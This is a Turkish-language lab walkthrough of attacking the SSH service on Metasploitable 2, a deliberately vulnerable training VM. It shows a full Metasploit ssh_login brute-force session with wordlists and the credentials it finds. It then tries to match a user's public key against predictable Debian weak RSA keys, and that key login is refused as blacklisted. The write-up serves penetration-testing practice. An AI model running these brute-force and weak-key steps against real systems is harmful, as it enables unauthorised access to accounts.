Metasploitable 2 Exploit ssh

Exploit # 13 : SSH

Sistemde ssh servisinin bulunduğu nmap çıktısından görülebilir:

22/tcp   open  ssh      OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

İyi bir kelime listesi ile ssh servisine bruteforce saldırısı sonuç verebilir.

msf > search ssh login

 

Matching Modules

================

  Name                                   Disclosure Date       Rank    Description

  —-                                   —————       —-    ———–

  auxiliary/scanner/ssh/ssh_login                                 normal SSH Login Check Scanner

  auxiliary/scanner/ssh/ssh_login_pubkey                          normal SSH Public Key Login Scanner

  exploit/linux/ssh/symantec_smg_ssh     2012-08-27 00:00:00 UTC  excellent  Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability

  exploit/unix/ssh/tectia_passwd_changereq  2012-12-01 00:00:00 UTC  excellent  Tectia SSH USERAUTH Change Request Password Reset Vulnerability

  post/windows/gather/credentials/mremote                         normal Windows Gather mRemote Saved Password Extraction

 

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > show options

 

Module options (auxiliary/scanner/ssh/ssh_login):

  Name           Current Setting  Required  Description

  —-           —————  ——–  ———–

  BLANK_PASSWORDS   true          no     Try blank passwords for all users

  BRUTEFORCE_SPEED  5             yes    How fast to bruteforce, from 0 to 5

  PASSWORD                        no     A specific password to authenticate with

  PASS_FILE                       no     File containing passwords, one per line

  RHOSTS                          yes    The target address range or CIDR identifier

  RPORT          22            yes    The target port

  STOP_ON_SUCCESS   false         yes    Stop guessing when a credential works for a host

  THREADS        1             yes    The number of concurrent threads

  USERNAME                        no     A specific username to authenticate as

  USERPASS_FILE                   no     File containing users and passwords separated by space, one pair per line

  USER_AS_PASS   true          no     Try the username as the password for all users

  USER_FILE                       no     File containing usernames, one per line

  VERBOSE        true          yes    Whether to print output for all attempts

 

msf auxiliary(ssh_login) > set RHOSTS 172.16.52.133

RHOSTS => 172.16.52.133

msf auxiliary(ssh_login) > set PASS_FILE /root/Desktop/password/500-worst-passwords.txt

PASS_FILE => /root/Desktop/password/500-worst-passwords.txt

msf auxiliary(ssh_login) > set USER_FILE /root/Desktop/password/username.txt

USER_FILE => /root/Desktop/password/username.txt

msf auxiliary(ssh_login) > exploit

 

[*] 172.16.52.133:22 SSH – Starting bruteforce

 

[*] 172.16.52.133:22 SSH – [0010/4516] – Trying: username: ‘msfadmin’ with password: ‘msfadmin’

[*] Command shell session 1 opened (172.16.52.128:42168 -> 172.16.52.133:22) at 2013-07-28 17:17:19 +0300

[+] 172.16.52.133:22 SSH – [0010/4516] – Success: ‘msfadmin’:’msfadmin’ ‘uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux ‘

[*] 172.16.52.133:22 SSH – [0011/4516] – Trying: username: ‘admin’ with password: ‘admin’

[-] 172.16.52.133:22 SSH – [0011/4516] – Failed: ‘admin’:’admin’

[*] 172.16.52.133:22 SSH – [0012/4516] – Trying: username: ‘root’ with password: ‘root’

[-] 172.16.52.133:22 SSH – [0012/4516] – Failed: ‘root’:’root’

[*] 172.16.52.133:22 SSH – [0013/4516] – Trying: username: ‘user’ with password: ‘user’

[*] Command shell session 2 opened (172.16.52.128:40412 -> 172.16.52.133:22) at 2013-07-28 17:17:24 +0300

[+] 172.16.52.133:22 SSH – [0013/4516] – Success: ‘user’:’user’ ‘uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux ‘

 

Bu verilerle bağlantı sağlanabilir.

 

#ssh msfadmin@172.16.52.133

msfadmin@172.16.52.133’s password:

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

 

The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

 

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

 

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

No mail.

Last login: Tue Jul 30 10:30:21 2013

msfadmin@metasploitable:~$ uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

msfadmin@metasploitable:~$ whoami

msfadmin

msfadmin@metasploitable:~/.ssh$ cat id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

 

Bu içerik ssh bağlantısı için üretilen bir anahtardır. Bu anahtarı kullanarak kullanıcı parolasını ihtiyaç duymadan da ssh ile bağlantı kurabiliriz.

Debian sistemlerde üretilen RSA keylerinin sayısı bellidir. Elimizdeki anahtarı bu keylerle karşılaştırıp , karşılık gelen .pub dosyasıyla sisteme giriş yapılabilir. SSH anahtarları (RSA 2048) linkinden indirilebilir. Bu keylerin olduğu klasöre gidip pub dosyası içerikleriyle karşılaştırılırsa

 

#root@kali:~/rsa/2048# grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w

 

57c3115d77c56390332dc5c49978627a-5429.pub

 

Bize bu kodu içeren anahtarı verdi . Bununla aşağıdaki sisteme giriş yapılabilir.

 

root@kali:~/rsa/2048# ssh -i 57c3115d77c56390332dc5c49978627a-5429.pub msfadmin@172.16.52.133

Public key 57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a blacklisted (see ssh-vulnkey(1)); refusing to send it

msfadmin@172.16.52.133’s password:

 

 

#ssh user@172.16.52.133

user@172.16.52.133’s password:

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

 

The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

Last login: Wed Jul 31 05:35:43 2013 from 172.16.52.128

user@metasploitable:~$uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux